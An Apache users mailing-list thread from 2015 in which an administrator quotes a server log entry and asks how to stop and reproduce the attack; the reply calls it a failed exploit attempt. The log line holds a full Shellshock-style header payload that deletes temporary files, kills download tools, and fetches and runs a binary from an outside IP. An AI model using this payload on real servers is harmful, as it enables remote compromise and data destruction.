It is an attempt to exploit a specific configuration. By the fact that
apache returned a 404 (the log line says so), you can see that attempt was
not successful.
- Y
Sent from a gizmo with a very small keyboard and hyperactive autocorrect.
On Jul 2, 2015 8:00 AM, "Victor Sterpu" <vic...@casnt.ro> wrote:
> Hello
>
> A hacker attacked a apache2 web server by HTTP injection.
> The log show what he has done:
> 62.1.212.154 - - [01/Jul/2015:17:02:06 +0300] "GET /phppath/cgi_wrapper
> HTTP/1.1" 404 280 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type:
> text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"cd /var/tmp/ ;cd /tmp/ ; rm -rf
> /tmp/* ; rm -rf /var/tmp/* ; rm -rf /tmp/.* ; rm -rf /var/tmp/.* ; crontab
> -r ; killall -9 wget fetch curl lwp-download b f r xx y i.gif print start
> pscan pnscan ps ; wget http://80.68.94.216/sc.gif ; curl -O
> http://80.68.94.216/sc.gif ; chmod +x sc.gif ; nohup ./sc.gif & \");'"
>
> How can I prevent this in the future and how can I reproduce?
> I tried to reproduce but is not clear how he launched this command and I
> want to know so I can test my vulnerabilities in the future.
> The path "/phppath/cgi_wrapper" doesn't exist at all.
>
> Thank you
>
> ---------------------------------------------------------------------
> To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org
> For additional commands, e-mail: users-h...@httpd.apache.org
>
>
